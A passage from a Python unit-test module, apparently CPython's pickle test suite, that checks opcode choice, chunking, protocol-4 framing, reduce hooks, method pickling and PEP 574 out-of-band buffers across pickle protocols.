self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_overridden_new(self):
# Test that a Python class with a C-implemented __new__ is pickleable
for proto in protocols:
x = MyIntWithNew2(1)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
self.assertIs(type(y), MyIntWithNew2)
self.assertEqual(int(y), 1)
self.assertEqual(y.foo, 42)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses the given
# opcode (EXT1, EXT2 or EXT4) under proto 2, and not under proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
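# A minimal sketch (not used by the tests), assuming only the documented
# copyreg extension-registry API: while an extension code is registered,
# protocol 2 pickles refer to the registered class through an EXT opcode
# instead of spelling out its module and name.
@staticmethod
def _extension_code_dump_sketch(module, name, code, obj):
    """Pickle obj with (module, name) temporarily bound to an extension code."""
    import copyreg
    import pickle
    copyreg.add_extension(module, name, code)
    try:
        return pickle.dumps(obj, 2)
    finally:
        copyreg.remove_extension(module, name, code)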
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in range(2):
with support.infinite_recursion():
self.assertRaises(RuntimeError, self.dumps, x, proto)
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
# Test compactness of int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# pickle sizes should be non-decreasing as the value grows
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
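# A minimal sketch (not used by the tests) of how frame boundaries can be
# located with the public pickletools API; each FRAME argument is the length
# of the framed data that follows the 9-byte opcode-plus-argument header
# accounted for above.
@staticmethod
def _frame_positions_sketch(pickled):
    """Return (position, frame_length) pairs for every FRAME opcode."""
    import pickletools
    return [(pos, arg) for op, arg, pos in pickletools.genops(pickled)
            if op.name == 'FRAME']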
@support.skip_if_pgo_task
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
# A single frame for small objects between
# the first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
# Large byte objects (dict values) interleaved with small objects
# (dict keys)
for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
@support.skip_if_pgo_task
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
# be released otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
            # but not too many either: there can be one for the proto,
            # one per-frame header, one per frame for the actual contents,
            # and two for the large string (its header and its contents).
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
            # There shouldn't be too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
# Test that whichmodule() errors out cleanly when looking up
# an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
#
# PEP 574 tests below
#
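    # Protocol 5 (PEP 574) adds PickleBuffer and an optional buffer_callback:
    # buffers for which the callback returns a false value are serialized
    # out-of-band, i.e. their data is left out of the pickle stream and must
    # be handed back to the unpickler via its ``buffers`` argument.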
def buffer_like_objects(self):
        # Yield buffer-like objects with the bytestring "abcdefgh" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
                    # Returning a true value from buffer_callback should have
                    # the same effect (the data stays in-band)
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
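                # PickleBuffer.raw() returns a memoryview of the underlying
                # contiguous memory; the views are stashed for the unpickling
                # step below.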
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
# Non iterable buffers
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
def test_inband_accept_default_buffers_argument(self):
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data_pickled = self.dumps(1, proto, buffer_callback=None)
data = self.loads(data_pickled, buffers=None)
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
